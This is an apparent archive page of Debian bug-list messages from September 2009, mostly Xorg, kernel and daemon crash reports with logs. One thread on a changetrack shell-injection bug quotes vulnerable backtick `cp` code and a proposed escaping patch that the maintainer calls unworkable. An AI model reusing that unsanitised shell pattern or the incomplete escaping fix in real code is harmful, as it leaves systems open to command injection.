Package: console-setup Version: 1.44 Severity: normal I came across this too. Removing the xorg.conf file allowed the install to complete. -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (990, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686 (SMP w/1 CPU core) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages console-setup depends on: ii console-terminus 4.28-1 Fixed-width fonts for fast reading ii debconf [debconf-2.0] 1.5.27 Debian configuration management sy ii xkb-data 1.6-1 X Keyboard Extension (XKB) configu Versions of packages console-setup recommends: ii console-tools 1:0.2.3dbs-66 Linux console and font utilities Versions of packages console-setup suggests: ii locales 2.9-25 GNU C Library: National Language ( ii lsb-base 3.2-23 Linux Standard Base 3.2 init scrip -- debconf information excluded -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547188: krandrtray does not come back automagically when we merge output
On Thu, Sep 17, 2009 at 16:49:14 +0200, Bastien ROUCARIES wrote: Package: kdebase-workspace-bin Version: 4:4.3.1-1 Severity: grave Krandrtray offer to go to previous setting after 15s if we do not click on ok. Unfortunatly it apply immediatly the setting when merging the output leading on my video output on a black screen, crashing my Xsession (therefore grave) Crashing your session is not the definition of grave. And I can't see how your session crashing can be a krandrtray bug. Cheers, Julien -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#547185: emacs23: May crash if old libotf0 is installed
Processing commands for cont...@bugs.debian.org: reassign 547185 libotf0 Bug #547185 [emacs23] emacs23: May crash if old libotf0 is installed Bug reassigned from package 'emacs23' to 'libotf0'. Bug No longer marked as found in versions emacs23/23.1+1-4. found 547185 0.9.9-1 Bug #547185 [libotf0] emacs23: May crash if old libotf0 is installed There is no source info for the package 'libotf0' at version '0.9.9-1' with architecture '' Unable to make a source version for version '0.9.9-1' Bug Marked as found in versions 0.9.9-1. severity 547185 serious Bug #547185 [libotf0] emacs23: May crash if old libotf0 is installed Severity set to 'serious' from 'important' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547186: g15daemon: Random crashes
Could you send also the output of grep g15daemon /var/log/syslog thanks cate -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547201: /usr/bin/X: No package xserver-xorg-video-ati available
Package: xserver-xorg Version: 1:7.4+4 Severity: grave Justification: renders package unusable File: /usr/bin/X I have a problem that arose the other day when xserver-xorg was updated. It seems like the problem was reported in bug 546975. During the update, the virtual screens were reconfigured, but I checked afterwards, that the xorg.conf was unaltered. I tried to follow the instructions to solve the problem, but when running apt-get install xserver-xorg-video-ati the reponse is: Couldn't find package xserver-xorg-video-ati. Now what? How do I come around that? For me this is a most important issue, as X will not start at all. Best regards, Petri Kaurinkoski -- Package-specific info: /var/lib/x11/X.roster does not exist. /var/lib/x11/X.md5sum does not exist. X server symlink status: lrwxrwxrwx 1 root root 13 2006-06-05 07:42 /etc/X11/X - /usr/bin/Xorg -rwxr-xr-x 1 root root 1689976 2009-08-06 19:55 /usr/bin/Xorg /var/lib/x11/xorg.conf.roster does not exist. VGA-compatible devices on PCI bus: 01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (rev 01) /var/lib/x11/xorg.conf.md5sum does not exist. Xorg X server configuration file status: lrwxrwxrwx 1 root root 16 2008-09-26 23:10 /etc/X11/xorg.conf - xorg.conf.compiz Contents of /etc/X11/xorg.conf: # xorg.conf (X.Org X Window System server configuration file) # # This file was generated by dexconf, the Debian X Configuration tool, using # values from the debconf database. # # Edit this file with caution, and see the xorg.conf manual page. # (Type man xorg.conf at the shell prompt.) # # This file is automatically updated on xserver-xorg package upgrades *only* # if it has not been modified since the last upgrade of the xserver-xorg # package. # # If you have edited this file but would like it to be automatically updated # again, run the following command: # sudo dpkg-reconfigure -phigh xserver-xorg Section InputDevice Identifier Generic Keyboard Driver kbd Option XkbRulesxorg Option XkbModelpc105 Option XkbLayout fi Option XkbVariant nodeadkeys EndSection Section InputDevice Identifier Configured Mouse Driver mouse EndSection # See http://wiki.debian.org/Compiz # Dedicated Extensions section (may not be present already) Section Extensions Option Composite enable EndSection Section Device Identifier Configured Video Device Option UseFBDevtrue Option XAANoOffscreenPixmaps true EndSection Section Monitor Identifier Configured Monitor EndSection Section Screen Identifier Default Screen Monitor Configured Monitor EndSection Xorg X server log files on system: -rw-r--r-- 1 root root 47608 2007-04-08 15:29 /var/log/Xorg.20.log -rw-r--r-- 1 root root 5033 2009-09-17 19:09 /var/log/Xorg.0.log Contents of most recent Xorg X server log file /var/log/Xorg.0.log: X.Org X Server 1.6.3 Release Date: 2009-7-31 X Protocol Version 11, Revision 0 Build Operating System: Linux 2.6.30.4-dsa-ia32 i686 Debian Current Operating System: Linux ressu 2.6.30-1-686 #1 SMP Sat Aug 15 19:11:58 UTC 2009 i686 Build Date: 06 August 2009 04:49:57PM xorg-server 2:1.6.3-1+b1 (bui...@murphy.debian.org) Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: /var/log/Xorg.0.log, Time: Thu Sep 17 19:09:49 2009 (==) Using config file: /etc/X11/xorg.conf (==) No Layout section. Using the first Screen section. (**) |--Screen Default Screen (0) (**) | |--Monitor Configured Monitor (==) No device specified for screen Default Screen. Using the first device section listed. (**) | |--Device Configured Video Device (==) Automatically adding devices (==) Automatically enabling devices (WW) The directory /usr/share/fonts/X11/cyrillic does not exist. Entry deleted from font path. (WW) The directory /var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType does not exist. Entry deleted from font path. (==) FontPath set to: /usr/share/fonts/X11/misc, /usr/share/fonts/X11/100dpi/:unscaled, /usr/share/fonts/X11/75dpi/:unscaled, /usr/share/fonts/X11/Type1, /usr/share/fonts/X11/100dpi, /usr/share/fonts/X11/75dpi, built-ins (==) ModulePath set to /usr/lib/xorg/modules (**) Extension Composite is enabled (II) Cannot locate a core pointer device. (II) Cannot locate a core keyboard device. (II) The server relies on HAL to provide the list of input devices. If no devices become available, reconfigure HAL or disable AllowEmptyInput. (II)
Bug#542551: marked as done (linux-image-2.6.30-1-686: System lockup (kernel freeze, soft lockup) on dual (multi) processor since 2.6.30)
Your message dated Thu, 17 Sep 2009 17:10:28 + with message-id e1mokv2-0007x3...@ries.debian.org and subject line Bug#542551: fixed in linux-2.6 2.6.30-7 has caused the Debian Bug report #542551, regarding linux-image-2.6.30-1-686: System lockup (kernel freeze, soft lockup) on dual (multi) processor since 2.6.30 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 542551: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=542551 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: linux-image-2.6.30-1-686 Version: 2.6.30-6 Severity: normal *** Please type your report below this line *** System lockups (kernel freeze, soft lockup) on dual (multi) processor since 2.6.30 and confirmed kernels are: * 2.6.30 * 2.6.30.1 * 2.6.30.2 * 2.6.30.3 * 2.6.30.4 * 2.6.30.5 * 2.6.31-rc6 And there is really _high_ probability, that everything in between 2.6.30.5 and 2.6.31-rc6 is affected. Debian's linux-image-2.6.30-1-686 is affected too. Affected systems: * Dual Pentim 2 (Pentium II) * Dual Pentim 3 (Pentium III) * Dual Pentium Pro (PPro) * Dual Athlon MP This bug is bisected and traced at: http://bugzilla.kernel.org/show_bug.cgi?id=13933 Even though this bug is still present and so other Debian users can be affected. If this refers to you, share yours _NEW_ information (not described earlier) at http://bugzilla.kernel.org/show_bug.cgi?id=13933 Thank you, regards Pavel Vilim ---End Message--- ---BeginMessage--- Source: linux-2.6 Source-Version: 2.6.30-7 We believe that the bug you reported is fixed in the latest version of linux-2.6, which is due to be installed in the Debian FTP archive: linux-2.6_2.6.30-7.diff.gz to pool/main/l/linux-2.6/linux-2.6_2.6.30-7.diff.gz linux-2.6_2.6.30-7.dsc to pool/main/l/linux-2.6/linux-2.6_2.6.30-7.dsc linux-doc-2.6.30_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-doc-2.6.30_2.6.30-7_all.deb linux-headers-2.6.30-2-all-amd64_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-all-amd64_2.6.30-7_amd64.deb linux-headers-2.6.30-2-all_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-all_2.6.30-7_amd64.deb linux-headers-2.6.30-2-amd64_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-amd64_2.6.30-7_amd64.deb linux-headers-2.6.30-2-common_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-common_2.6.30-7_amd64.deb linux-image-2.6.30-2-amd64_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-image-2.6.30-2-amd64_2.6.30-7_amd64.deb linux-libc-dev_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-libc-dev_2.6.30-7_amd64.deb linux-manual-2.6.30_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-manual-2.6.30_2.6.30-7_all.deb linux-patch-debian-2.6.30_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-patch-debian-2.6.30_2.6.30-7_all.deb linux-source-2.6.30_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-source-2.6.30_2.6.30-7_all.deb linux-support-2.6.30-2_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-support-2.6.30-2_2.6.30-7_all.deb linux-tree-2.6.30_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-tree-2.6.30_2.6.30-7_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 542...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Bastian Blank wa...@debian.org (supplier of updated linux-2.6 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 16 Sep 2009 17:23:13 +0200 Source: linux-2.6 Binary: linux-source-2.6.30 linux-doc-2.6.30 linux-manual-2.6.30 linux-patch-debian-2.6.30 linux-tree-2.6.30 linux-support-2.6.30-2 linux-libc-dev linux-headers-2.6.30-2-all linux-headers-2.6.30-2-all-alpha linux-headers-2.6.30-2-common linux-image-2.6.30-2-alpha-generic linux-headers-2.6.30-2-alpha-generic linux-image-2.6.30-2-alpha-smp linux-headers-2.6.30-2-alpha-smp linux-image-2.6.30-2-alpha-legacy linux-headers-2.6.30-2-alpha-legacy linux-headers-2.6.30-2-all-amd64 linux-image-2.6.30-2-amd64 linux-headers-2.6.30-2-amd64 linux-headers-2.6.30-2-all-arm linux-image-2.6.30-2-footbridge linux-headers-2.6.30-2-footbridge linux-image-2.6.30-2-iop32x linux-headers-2.6.30-2-iop32x linux-image-2.6.30-2-ixp4xx linux-headers-2.6.30-2-ixp4xx
Bug#543381: marked as done (linux-image-2.6.30-1-686: Dell PowerEdge 2400 with PERC RAID 2/Si and 2.6.30, system locks hard)
Your message dated Thu, 17 Sep 2009 17:10:28 + with message-id e1mokv2-0007x3...@ries.debian.org and subject line Bug#542551: fixed in linux-2.6 2.6.30-7 has caused the Debian Bug report #542551, regarding linux-image-2.6.30-1-686: Dell PowerEdge 2400 with PERC RAID 2/Si and 2.6.30, system locks hard to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 542551: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=542551 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: linux-image-2.6.30-1-686 Version: 2.6.30-5 Severity: important After an undetermined but brief (no more than 10 minutes) period this system simply locks hard when running the 2.6.30 kernel. After regressing to the 2.6.26 kernel and checking the raid controller, memory tests and operation for more than 12 hours everything seems fine. Booting into the 2.6.30 kernel results in more hard locks with no errors on console or in kernel logs. The one notable hardware component in this system being the PERC 2/Si RAID controller which utilizes the aacraid driver. -- Package-specific info: -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (900, 'testing'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-2-686 (SMP w/2 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/dash Versions of packages linux-image-2.6.30-1-686 depends on: ii debconf [debconf-2.0] 1.5.27 Debian configuration management sy ii initramfs-tools [linux-initra 0.93.4 tools for generating an initramfs ii module-init-tools 3.9-2 tools for managing Linux kernel mo Versions of packages linux-image-2.6.30-1-686 recommends: ii libc6-i6862.9-23 GNU C Library: Shared libraries [i Versions of packages linux-image-2.6.30-1-686 suggests: ii grub 0.97-55GRand Unified Bootloader (dummy pa ii grub-legacy [grub]0.97-55GRand Unified Bootloader (Legacy v pn linux-doc-2.6.30 none (no description available) -- debconf information: linux-image-2.6.30-1-686/preinst/lilo-has-ramdisk: shared/kernel-image/really-run-bootloader: true linux-image-2.6.30-1-686/postinst/old-initrd-link-2.6.30-1-686: true linux-image-2.6.30-1-686/postinst/create-kimage-link-2.6.30-1-686: true linux-image-2.6.30-1-686/postinst/depmod-error-2.6.30-1-686: false linux-image-2.6.30-1-686/postinst/old-system-map-link-2.6.30-1-686: true linux-image-2.6.30-1-686/prerm/would-invalidate-boot-loader-2.6.30-1-686: true linux-image-2.6.30-1-686/preinst/overwriting-modules-2.6.30-1-686: true linux-image-2.6.30-1-686/preinst/lilo-initrd-2.6.30-1-686: true linux-image-2.6.30-1-686/postinst/old-dir-initrd-link-2.6.30-1-686: true linux-image-2.6.30-1-686/preinst/failed-to-move-modules-2.6.30-1-686: linux-image-2.6.30-1-686/postinst/bootloader-test-error-2.6.30-1-686: linux-image-2.6.30-1-686/preinst/abort-install-2.6.30-1-686: linux-image-2.6.30-1-686/postinst/bootloader-error-2.6.30-1-686: linux-image-2.6.30-1-686/preinst/initrd-2.6.30-1-686: linux-image-2.6.30-1-686/prerm/removing-running-kernel-2.6.30-1-686: true linux-image-2.6.30-1-686/postinst/kimage-is-a-directory: linux-image-2.6.30-1-686/preinst/abort-overwrite-2.6.30-1-686: linux-image-2.6.30-1-686/preinst/elilo-initrd-2.6.30-1-686: true linux-image-2.6.30-1-686/preinst/bootloader-initrd-2.6.30-1-686: true linux-image-2.6.30-1-686/postinst/depmod-error-initrd-2.6.30-1-686: false ---End Message--- ---BeginMessage--- Source: linux-2.6 Source-Version: 2.6.30-7 We believe that the bug you reported is fixed in the latest version of linux-2.6, which is due to be installed in the Debian FTP archive: linux-2.6_2.6.30-7.diff.gz to pool/main/l/linux-2.6/linux-2.6_2.6.30-7.diff.gz linux-2.6_2.6.30-7.dsc to pool/main/l/linux-2.6/linux-2.6_2.6.30-7.dsc linux-doc-2.6.30_2.6.30-7_all.deb to pool/main/l/linux-2.6/linux-doc-2.6.30_2.6.30-7_all.deb linux-headers-2.6.30-2-all-amd64_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-all-amd64_2.6.30-7_amd64.deb linux-headers-2.6.30-2-all_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-all_2.6.30-7_amd64.deb linux-headers-2.6.30-2-amd64_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-amd64_2.6.30-7_amd64.deb linux-headers-2.6.30-2-common_2.6.30-7_amd64.deb to pool/main/l/linux-2.6/linux-headers-2.6.30-2-common_2.6.30-7_amd64.deb linux-image-2.6.30-2-amd64_2.6.30-7_amd64.deb to
Bug#541307: marked as done (agp/intel: gpu lockups on 865G)
Your message dated Thu, 17 Sep 2009 17:10:28 + with message-id e1mokv2-0007wz...@ries.debian.org and subject line Bug#541307: fixed in linux-2.6 2.6.30-7 has caused the Debian Bug report #541307, regarding agp/intel: gpu lockups on 865G to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 541307: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=541307 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: xserver-xorg Version: 1:7.4+3 Severity: important On entering X and using applications for a short period X locks up and the keyboard becomes unusable. The mouse continues to move but clicks are not responded too. The only solution is to log in remotely using ssh and reboot. -- Package-specific info: /var/lib/x11/X.roster does not exist. /var/lib/x11/X.md5sum does not exist. X server symlink status: lrwxrwxrwx 1 root root 13 2009-08-12 20:54 /etc/X11/X - /usr/bin/Xorg -rwxr-xr-x 1 root root 1689976 2009-08-06 17:55 /usr/bin/Xorg /var/lib/x11/xorg.conf.roster does not exist. VGA-compatible devices on PCI bus: 00:02.0 VGA compatible controller: Intel Corporation 82865G Integrated Graphics Controller (rev 02) /var/lib/x11/xorg.conf.md5sum does not exist. Xorg X server configuration file status: -rw-r--r-- 1 root root 0 2009-08-12 20:53 /etc/X11/xorg.conf Contents of /etc/X11/xorg.conf: Xorg X server log files on system: -rw-r--r-- 1 root root 22441 2009-08-13 08:54 /var/log/Xorg.0.log Contents of most recent Xorg X server log file /var/log/Xorg.0.log: X.Org X Server 1.6.3 Release Date: 2009-7-31 X Protocol Version 11, Revision 0 Build Operating System: Linux 2.6.30.4-dsa-ia32 i686 Debian Current Operating System: Linux Thor 2.6.30-1-686 #1 SMP Mon Aug 3 16:18:30 UTC 2009 i686 Build Date: 06 August 2009 04:49:57PM xorg-server 2:1.6.3-1+b1 (bui...@murphy.debian.org) Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: /var/log/Xorg.0.log, Time: Thu Aug 13 08:54:55 2009 (==) Using config file: /etc/X11/xorg.conf (==) No Layout section. Using the first Screen section. (==) No screen section available. Using defaults. (**) |--Screen Default Screen Section (0) (**) | |--Monitor default monitor (==) No monitor specified for screen Default Screen Section. Using a default monitor configuration. (==) Automatically adding devices (==) Automatically enabling devices (WW) The directory /usr/share/fonts/X11/cyrillic does not exist. Entry deleted from font path. (WW) The directory /usr/share/fonts/X11/Type1 does not exist. Entry deleted from font path. (==) FontPath set to: /usr/share/fonts/X11/misc, /usr/share/fonts/X11/100dpi/:unscaled, /usr/share/fonts/X11/75dpi/:unscaled, /usr/share/fonts/X11/100dpi, /usr/share/fonts/X11/75dpi, /var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType, built-ins (==) ModulePath set to /usr/lib/xorg/modules (II) Cannot locate a core pointer device. (II) Cannot locate a core keyboard device. (II) The server relies on HAL to provide the list of input devices. If no devices become available, reconfigure HAL or disable AllowEmptyInput. (II) Loader magic: 0x6c0 (II) Module ABI versions: X.Org ANSI C Emulation: 0.4 X.Org Video Driver: 5.0 X.Org XInput driver : 4.0 X.Org Server Extension : 2.0 (II) Loader running on linux (++) using VT number 7 (--) PCI:*(0:0:2:0) 8086:2572:1458:2572 Intel Corporation 82865G Integrated Graphics Controller rev 2, Mem @ 0xf000/134217728, 0xfa00/524288, I/O @ 0xc000/8 (II) Open ACPI successful (/var/run/acpid.socket) (II) System resource ranges: [0] -1 0 0x - 0x (0x1) MX[B] [1] -1 0 0x000f - 0x000f (0x1) MX[B] [2] -1 0 0x000c - 0x000e (0x3) MX[B] [3] -1 0 0x - 0x0009 (0xa) MX[B] [4] -1 0 0x - 0x (0x1) IX[B] [5] -1 0 0x - 0x (0x1) IX[B] (II) LoadModule: extmod (II) Loading /usr/lib/xorg/modules/extensions//libextmod.so (II) Module extmod: vendor=X.Org Foundation compiled for 1.6.3, module version = 1.0.0 Module class: X.Org Server Extension ABI class: X.Org Server Extension, version 2.0 (II) Loading extension SELinux (II)
Bug#547186: g15daemon: Random crashes
It just says things like: Sep 17 19:23:37 hansi g15daemon: Process died - removing pidfile Sep 17 19:23:37 hansi g15daemon[26352]: Booting plugin Linux UINPUT Keyboard Output Sep 17 19:23:37 hansi g15daemon[26352]: Plugin Linux UINPUT Keyboard Output boot successful. Sep 17 19:23:37 hansi g15daemon[26352]: Booting plugin Clock Sep 17 19:23:37 hansi g15daemon[26352]: Plugin Clock boot successful. Sep 17 19:23:37 hansi g15daemon[26352]: Booting plugin LCDServer Sep 17 19:23:38 hansi g15daemon[26352]: Plugin LCDServer boot successful. There is no additional information. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#541155: Still cannot reproduce
severity 541155 important thanks I'm downgrading this because I still cannot reproduce it. Are you able to test with a Lenny installation? You'd either have to compile the guest utils yourself, or wait for me to create a backport which is on my agenda as soon as this version hits testing. Michael -- Michael Meskes Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org) Michael at BorussiaFan dot De, Meskes at (Debian|Postgresql) dot Org ICQ: 179140304, AIM/Yahoo/Skype: michaelmeskes, Jabber: mes...@jabber.org Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL! -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#541630: marked as done (r128: Missing initialisation tests; missing firmware or deliberate attack can lead to crash)
Your message dated Thu, 17 Sep 2009 17:10:28 + with message-id e1mokv2-0007x1...@ries.debian.org and subject line Bug#541630: fixed in linux-2.6 2.6.30-7 has caused the Debian Bug report #541630, regarding r128: Missing initialisation tests; missing firmware or deliberate attack can lead to crash to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 541630: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=541630 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: linux-image-2.6.30-1-686 Version: 2.6.30-5 Severity: important Hi, after installing linux-image-2.6.30-1-686, Xorg (ATI Rage 128 Pro Ultra TF) doesn't start, freezing both monitor and keyboard. (The system is only accessible by remote (ssh), just in case someone with the same problem wants to reboot or shutdown the system properly). I don't know which logs or info are the most useful to you to handle this bug, so don't hesitate to ask. In the meantime: * lspci - VGA compatible controller: ATI Technologies Inc Rage 128 Pro Ultra TF * kern.log: [drm] Initialized r128 2.5.0 20030725 for :01:00.0 on minor 0 agpgart-intel :00:00.0: AGP 2.0 bridge agpgart-intel :00:00.0: putting AGP V2 device into 1x mode pci :01:00.0: putting AGP V2 device into 1x mode platform r128_cce.0: firmware: requesting r128/r128_cce.bin r128_cce: Failed to load firmware r128/r128_cce.bin [drm:r128_do_init_cce] *ERROR* Failed to load firmware! BUG: unable to handle kernel NULL pointer dereference at 0094 IP: [d884a83c] r128_cce_stop+0x6a/0xdd [r128] *pde = Oops: [#1] SMP last sysfs file: /sys/devices/platform/r128_cce.0/firmware/r128_cce.0/loading Modules linked in: r128 drm sco ppdev lp bridge stp bnep rfcomm l2cap bluetooth speedstep_lib cpufreq_conservative cpufreq_userspace cpufreq_powersave cpufreq_stats ext2 fuse loop snd_intel8x0 snd_ac97_codec snd_cs4236 ac97_bus snd_pcm_oss snd_mixer_oss snd_wavefront snd_wss_lib snd_opl3_lib snd_pcm snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device serio_raw i2c_i801 shpchp ns558 pcspkr rng_core psmouse evdev i2c_core pci_hotplug snd snd_page_alloc gameport parport_pc soundcore parport button processor ext3 jbd mbcache dm_mirror dm_region_hash dm_log dm_snapshot dm_mod ide_cd_mod cdrom ide_gd_mod ide_pci_generic ata_generic libata scsi_mod uhci_hcd ehci_hcd piix 8139cp 8139too intel_agp mii ide_core usbcore agpgart floppy thermal fan thermal_sys Pid: 3551, comm: Xorg Not tainted (2.6.30-1-686 #1) EIP: 0060:[d884a83c] EFLAGS: 00013202 CPU: 0 EIP is at r128_cce_stop+0x6a/0xdd [r128] EAX: 8001 EBX: d74c9b80 ECX: d886d000 EDX: d6ed0500 ESI: EDI: d6849e98 EBP: d6c4fc00 ESP: d6849e7c DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process Xorg (pid: 3551, ti=d6848000 task=d686c6d0 task.ti=d6848000) Stack: d6849e98 0042 40086442 d74c9b80 d896467f d6c4fc00 d884a7d2 0001 0001 8000 0001 0010 2710 0020 0480 003ce400 0480 0020 0079a400 0480 00b66400 d400 Call Trace: [d897a67f] ? drm_ioctl+0x1ca/0x24b [drm] [d884e7d2] ? r128_cce_stop+0x0/0xdd [r128] [c01971e4] ? vfs_ioctl+0x49/0x5f
Processed: Still cannot reproduce
Processing commands for cont...@bugs.debian.org: severity 541155 important Bug #541155 [virtualbox-ose-guest-x11] virtualbox-ose-guest-x11: VT switch kills X Severity set to 'important' from 'grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: changetrack: shell command injection via filename
2009/9/17 Marek Grzybowski marek.grzybow...@atm.com.pl:
Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs
should be safe to:
His patch:
[...]
+ my $realfile_esc = escape_shell_chars ($realfile);
[...]
- `cp $realfile $compfile`;
+ `cp $realfile_esc $compfile_esc`;
[...]
+sub escape_shell_chars
+{
+ my $arg = shift;
+ $arg =~ s/[;\*\|`\$!#\(\)\[\]\{\}:'\s]/\\$/g;
+ return $arg;
+}
This is not going work. When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc. I will go for the solution of rejecting weird file
names.
Cheers,
--
Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547204: `free_smartphone_resource_dbus_proxy_new' implicitly converted to pointer
Package: fso-usaged Version: 0.9.0+git20090818-2 Severity: serious Usertags: implicit-pointer-conversion Our automated buildd log filter[1] detected a problem that is likely to cause your package to segfault on architectures where the size of a pointer is greater than the size of an integer, such as ia64 and amd64. Function `free_smartphone_resource_dbus_proxy_new' implicitly converted to pointer at plugin.c:290 This is often due to a missing function prototype definition. For more information, see [2]. Though it is guaranteed that this codepath will cause a segfault on certain architectures, it is not guaranteed that this codepath would ever be executed (e.g., if the returned pointer is never dereferenced). However, this bug does prevent the ia64 buildd from successfully building this package, resulting in a practical FTBFS issue and warranting the serious severity. [1] http://people.debian.org/~dannf/check-implicit-pointer-functions [2] http://wiki.debian.org/ImplicitPointerConversions -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547201: marked as done (/usr/bin/X: No package xserver-xorg-video-ati available)
Your message dated Thu, 17 Sep 2009 20:11:20 +0200 with message-id 20090917181120.gv14...@radis.liafa.jussieu.fr and subject line Re: Bug#547201: /usr/bin/X: No package xserver-xorg-video-ati available has caused the Debian Bug report #547201, regarding /usr/bin/X: No package xserver-xorg-video-ati available to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 547201: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=547201 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: xserver-xorg Version: 1:7.4+4 Severity: grave Justification: renders package unusable File: /usr/bin/X I have a problem that arose the other day when xserver-xorg was updated. It seems like the problem was reported in bug 546975. During the update, the virtual screens were reconfigured, but I checked afterwards, that the xorg.conf was unaltered. I tried to follow the instructions to solve the problem, but when running apt-get install xserver-xorg-video-ati the reponse is: Couldn't find package xserver-xorg-video-ati. Now what? How do I come around that? For me this is a most important issue, as X will not start at all. Best regards, Petri Kaurinkoski -- Package-specific info: /var/lib/x11/X.roster does not exist. /var/lib/x11/X.md5sum does not exist. X server symlink status: lrwxrwxrwx 1 root root 13 2006-06-05 07:42 /etc/X11/X - /usr/bin/Xorg -rwxr-xr-x 1 root root 1689976 2009-08-06 19:55 